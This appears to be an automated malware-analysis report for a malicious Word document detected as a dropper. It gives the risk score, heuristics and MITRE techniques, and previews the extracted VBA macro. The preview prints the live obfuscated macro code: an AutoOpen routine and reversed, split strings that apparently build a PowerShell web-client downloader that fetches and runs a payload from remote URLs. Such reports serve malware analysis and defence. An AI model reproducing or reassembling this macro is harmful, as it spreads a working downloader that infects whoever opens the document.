MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6544921-0' further supports its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6544921-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6544921-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 123359 bytes |
SHA-256: 6e2bdf87c412a8242b9ace19bf53a7fa02444e8ca53901f3cf6b3588900a9a02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZYZqMEaPRJvU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub LrSmK(GaBsr)
PECwC = JphJEu
FEooLN = ZaDwF
WPiYC = UIfpdB + Sgn(4567 - WrYCmX - FBSlp + Fix(59485)) - 38260 - CDbl(75173)
BEstHt = 14052
End Sub
Sub GVaaZ(KnJmB)
CBLiEQ = QnNEA
qoZII = ckQvQ
dfnHwj = SFmzsK + Sgn(78228 - fqVtRZ - jZkiA + Fix(35640)) - 48905 - CDbl(94771)
Fukblb = 16949
jLiPDp = zUdwtu
zXYwN = UjZsH
uzaNE = ihMFr + Sgn(79794 - kDjjoc - rCuND + Fix(79295)) - 26710 - CDbl(72414)
zlpHD = 89861
XGYsLN = ujiQdU
AlQEIr = MJPqw
MTBhb = TIZPjr + Sgn(58151 - AhUYk - fzAZD + Fix(89809)) - 6393 - CDbl(62721)
zJCPA = 55357
End Sub
Sub iApnAf(VjMiiC)
orFihN = cihmm
cGjcdk = CTjzRA
fsqQZ = iISzkT + Sgn(30033 - CWIBN - wOzjAt + Fix(53575)) - 56379 - CDbl(40567)
INjon = 67761
QNITUo = sKUSAz
vDTZRs = PfCBn
pWmbU = jroEN + Sgn(59494 - QrpYJ - YhMJMO + Fix(42243)) - 81333 - CDbl(61856)
hFRji = 88718
End Sub
Sub Autoopen()
On Error Resume Next
YtwhN = HwFurc
ZGtYO = cNaMwc
pGzwz = WWRiLv + Sgn(20688 - FLGUiO - baMtR + Fix(4028)) - 33985 - CDbl(15409)
hzEJuA = 99081
nnAIWEZWYoLj (wwFsI + UQLjjLuCijrDE + icEfXB)
sUOmO = mDfsEO
zLrAD = LzXiI
TwiQN = uGfpf + Sgn(80102 - fUMGQ - AdoiW + Fix(71163)) - 6230 - CDbl(54297)
qVUlG = 25772
End Sub
Sub hImSWK(oHjBd)
jwrGi = viTHf
ubQJU = jJkmET
hpUAXq = ZEjriO + Sgn(14550 - RROAGH - jsinmS + Fix(37742)) - 75675 - CDbl(94217)
XHzRbd = 93416
wkprY = GllsTY
NqFGb = kDQGR
wHGKjq = RjKWmr + Sgn(37741 - jAhbU - qKQrL + Fix(98587)) - 15140 - CDbl(24144)
fiYFc = 45651
bEBfH = CUTPI
DDjiw = GwpSV
fEVirN = rcjZcZ + Sgn(79006 - VHwYw - mJKwAb + Fix(84092)) - 41743 - CDbl(51537)
IjKzC = 97984
End Sub
Sub cFdQt(iGFHw)
psuYAt = LirluV
VQsOp = WjUSS
smfpuT = llRNKK + Sgn(11064 - nqkTj - rANOrS + Fix(64775)) - 26700 - CDbl(11359)
cGaAJ = 61367
End Sub
Attribute VB_Name = "zSzkQEChDjIjt"
Sub wjfBlS(DBNXft)
EkEwHz = BkKbwK
niYiMo = WvzYNR
QlNkKS = TiMcvv + Sgn(93497 - UZoHuQ - osSEG + Fix(65588)) - 79861 - CDbl(10097)
tjukw = 93482
End Sub
Function UQLjjLuCijrDE()
On Error Resume Next
msDUDM = QthXa
jGWdzz = RGLud
niPBL = YhCOr + Sgn(91720 - bqCLY - PiomJ + Fix(32420)) - 76349 - CDbl(2332)
ZjjIqd = 48696
wlfqzq = kHuub
QznOJ = Gnnrc
GXJGw = aIkzJZ + Sgn(29771 - PTTkv - vwMmZ + Fix(26754)) - 82949 - CDbl(39649)
zJtCUt = 37442
FnBhSBfm = qfvUob("ISWNLcilbu'+'p:v'+'neS'+'gY = CD'+'SSgY'+';)ucL'+'@uc'+'L(t'+'ilpS.u'+'cLnray.2o'+'hu=l?php'+'.vtse'+'t/NUH'+'/moc.1dw9qd'+'w1q'+'w9'+'5nt", 15964 + 4 - 15964, 15964 + 130 - 15964)
iKHUTR = oOzwF
UCwHaJ = XjjvF
mpPXvT = YpZoAc + Sgn(60806 - wLOuOp - GzutjI + Fix(44336)) - 95305 - CDbl(52587)
OnibY = 82514
uDPrSP = hbTGIW
NJzKSk = wwczZl
HmiZwP = KYmMFT + Sgn(91936 - htAOD - DGRWV + Fix(4640)) - 97518 - CDbl(13446)
tsiGZo = 77858
wUhbjzcwwSO = qfvUob("kj7beW.teN.'+'me'+'ts'+'yS )'+'ucLtce'+'j'+'b'+'o-ucL+ucLwuc'+'L+'+'ucLenucL('+'. ='+' UYYSgY;m'+'o'+'dnar '+')uc'+'LtucL+'+'ucLcej'+'bo-wucL+u'+'c'+'L'+'eucL+u'+'cL'+'nucL'+'(&'+' ='+' '+'dsa'+NvF8", 7553 + 5 - 7553, 7553 + 191 - 7553)
MGGDlM = MRjaPi
KhiEfN = aNdDl
UbMWjs = oIwwS + Sgn(89215 - JEWXr - whwYV + Fix(16874)) - 52058 - CDbl(58558)
tdzzSd = 71712
AkwnL = KBGwSk
FPwhq = EQNcRt
wzSMj = RsWUqS + Sgn(54690 - bRDFB - dWbCbQ + Fix(49232)) - 90018 - CDbl(1375)
IitowM = 67155
PzzEwlMo = qfvUob("s3PiU9'dasnSgY'((@", 7819 + 2 - 7819, 7819 + 11 - 7819)
PfTIjv = OOWcw
XQItZ = QkTNW
jLLZnY = iKqWR + Sgn(40742 - jwMBDR - dlOkv + Fix(47390)) - 82480 - CDbl(36151)
wRzQz = 68100
OWQQP = citnEX
IMljRi = EmIhk
DrVSmU = NjUjh + Sgn(45860 - toFFMc - woSuEw + Fix(43614)) - 32569 - CDbl(53481)
ifatk = 17444
mVVYKs = qfvUob("52wDAlpeRC-29]RAhc[,)09]RAhc[+18]RAhc[+411]RAhc[( EcALpEr-)'}}{'+'hctac'+'};kae'+'r'+'b;)CDSS'+'g'+'Y()uc'+'Lme'+'tI-eucL+ucLk'+'ucL+ucL'+'o'+'vnIucL'+'(&;)C'+'DSSgY ,)('+'50X'+h6", 89544 + 3 - 89544, 89544 + 173 - 89544
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.